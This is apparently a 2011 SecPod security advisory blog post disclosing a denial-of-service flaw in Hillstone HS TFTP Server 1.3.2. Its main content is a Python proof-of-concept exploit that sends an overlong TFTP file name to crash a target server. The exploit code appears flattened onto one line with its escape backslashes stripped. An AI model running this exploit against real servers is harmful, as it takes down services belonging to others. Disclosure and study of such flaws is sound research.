Hillstone Software HS TFTP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in Hillstone Software HS TFTP Server. The vulnerability is caused due to improper validation of WRITE/READ Request Parameter containing long file name. The flaw can be exploited to crash the service but can be st...

Dec 1, 2011By Veerendra GG2 min read

Also, a patch management solution can patch this flaw.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python ############################################################################## # Title : Hillstone Software HS TFTP Server Denial Of Service Vulnerability # Author : Prabhu S Angadi from SecPod Technologies (www.secpod.com) # Vendor : http://www.hillstone-software.com/hs_tftp_details.htm # Advisory : https://www.secpod.com/blog/?p=419 # http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt # http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py # Version : Hillstone Software HS TFTP 1.3.2 # Date : 02/12/2011 ############################################################################## import socket,sys,time port = 69 target = raw_input("Enter host/target ip address: ") if not target: print "Host/Target IP Address is not specified" sys.exit(1) print "you entered ", target try: socket.inet_aton(target) except socket.error: print "Invalid IP address found ..." sys.exit(1) try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed" sys.exit(1) ## File name >= 222 length leads to crash exploit = "x90" * 2222 mode = "binary" print "File name WRITE/READ crash" ## WRITE command = x00x02 data = "x00x02" + exploit + "" + mode + "" ## READ command = x00x01 ## data = "x00x01" + exploit + "" + mode + "" sock.sendto(data, (target, port)) time.sleep(2) sock.close() try: sock.connect() except: print "Remote TFTP server port is down..." sys.exit(1)

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

CVE-2026-31431: From 732 Bytes to Root - Anatomy of a Modern Linux Privilege Escalation

Jun 24, 2026

CVE-2026-31431: The Nine-Year Kernel Bug Hiding in Plain Sight

CVE Research

CVE-2026-31431: The Nine-Year Kernel Bug Hiding in Plain Sight

Jun 23, 2026

CVE Research

Squidbleed: A 29-Year-Old Squid Proxy Flaw That Leaks Cleartext HTTP Requests

Jun 23, 2026

CVE Research

AryStinger Malware Leverages 4,300+ Legacy Routers to Establish Persistent Spy Infrastructure

AryStinger represents a calculated shift in IoT threat methodology, abandoning noisy, destructive payloads in favor of silent, long-term reconnaissance infrastructure. By exploiting unpatched, end-of-life routers and NAS devices through decade-old vulnerabilities, the threat operator has assembled a distributed fleet of over 4,300 Executor nodes capable of conducting parallelized DNS enumeration, port scanning, and service fingerprinting at scale, all while masking origin behind residential IP addresses. With active development ongoing and a potential operational timeline stretching back to 2024, AryStinger underscores a growing and underappreciated risk: forgotten edge hardware is not merely a compliance gap but exploitable infrastructure.

Jun 23, 2026

Search across all Learn content

Hillstone Software HS TFTP Server Denial Of Service Vulnerability

Featured Posts

CVE-2026-31431: From 732 Bytes to Root - Anatomy of a Modern Linux Privilege Escalation

CVE-2026-31431: The Nine-Year Kernel Bug Hiding in Plain Sight

Squidbleed: A 29-Year-Old Squid Proxy Flaw That Leaks Cleartext HTTP Requests

AryStinger Malware Leverages 4,300+ Legacy Routers to Establish Persistent Spy Infrastructure

Customers

Learn

Support